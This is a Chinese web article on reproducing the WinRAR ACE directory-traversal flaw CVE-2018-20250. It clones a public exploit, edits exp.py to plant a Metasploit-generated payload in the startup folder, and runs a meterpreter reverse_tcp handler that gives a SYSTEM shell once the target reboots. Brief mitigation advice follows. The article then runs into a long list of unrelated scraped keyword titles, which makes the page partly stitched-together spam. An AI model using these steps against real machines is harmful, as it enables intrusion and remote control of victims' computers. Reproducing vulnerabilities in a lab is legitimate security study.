WinRAR目录穿越漏洞
发表于:2025-01-21 作者:千家信息网编辑
千家信息网最后更新 2025年01月21日,该漏洞是由于WinRAR 所使用的一个陈旧的动态链接库UNACEV2.dll所造成的,该动态链接库在2006 年被编译,没有任何的基础保护机制(ASLR,DEP 等)。该动态链接库的作用是处理ACE
千家信息网最后更新 2025年01月21日WinRAR目录穿越漏洞复现环境
https://github.com/WyAtu/CVE-2018-20250/ 复现过程
漏洞防御
该漏洞是由于WinRAR 所使用的一个陈旧的动态链接库UNACEV2.dll所造成的,该动态链接库在2006 年被编译,没有任何的基础保护机制(ASLR,DEP 等)。该动态链接库的作用是处理ACE 格式文件。而在解压处理过程中存在一处目录穿越漏洞,允许解压过程写入文件至开机启动项,导致代码执行
漏洞编号: CVE-2018-20250
影响版本:
WinRAR < 5.70 Beta 1
Bandizip < = 6.2.0.0
好压(2345压缩) < = 5.9.8.10907
360压缩 < = 4.0.0.1170
exp下载:
1.使用Metasploit生成Payload
2.使用exp生成恶意程序
cd /root/Desktopgit clone https://github.com/WyAtu/CVE-2018-20250.gitcd CVE-2018-20250cp /root/WinRAR.exe ./vim exp.py
将exp.py中的evil_filename = "calc.exe"改为"WinRAR.exe"
将CVE-2018-20250文件夹复制到Windows10中执行
3.在靶机上运行恶意程序
将test.rar 投放到win8上 解压运行
4.在kali上监听metasploit
msf exploit(handler) > set payload windows/meterpreter/reverse_tcpmsf exploit(handler) > set lhost 192.168.112.140msf exploit(handler) > set lport 44444msf exploit(handler) > run www.gendan5.com
5.控制靶机
Win8重启之后 kali会接受到会话 此时执行shell
进入到win8系统的system权限
1. 删除受影响压缩软件目录下UNACEV2.dll文件能有效防御
2. 升级到最新版本,WinRAR 目前版本是 5.70 Beta 1
3. 总而言之,该漏洞并没有那么致命。目标性的打站,得先欺骗下载,并再在未防护的服务器上解压,企业服务器管理员都很难会这样做。而且必须得服务器重启才能生效,不能直接执行脚本
漏洞
文件
动态
服务器
版本
过程
链接
服务
目录
恶意
程序
靶机
处理
影响
生成
运行
防御
有效
陈旧
代码
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
宁波镇海区惠普机架式服务器
脏小豆服务器什么配置
海湾战争期间的网络安全
软件开发公司薪酬制度设计
做好网络安全考核工作
一个运维管理几台服务器
剪映软件开发商是哪个公司
plsql还原数据库备份
淮安访客系统软件开发
JAVA怎么去监听数据库
手机开发用什么服务器
怎么给数据库数据去重
武隆民宿软件开发
海南通用软件开发厂家报价
网络技术与电信
宏基因云服务器
oracle 找回数据库
mc服务器租用
苏州喔噻互联网科技薪金
青庭网络技术有限公司招聘
维护网络安全扎实推进
小型计算机网络技术
数据库中的检查约束性别
南方基金软件开发待遇怎么样
云服务器怎么进不了后台
国防科大数据库查重
县疾控网络安全应急预案
网络安全操作规程百度文库
网络安全法风险评估由谁进行
乡镇网络安全周启动仪式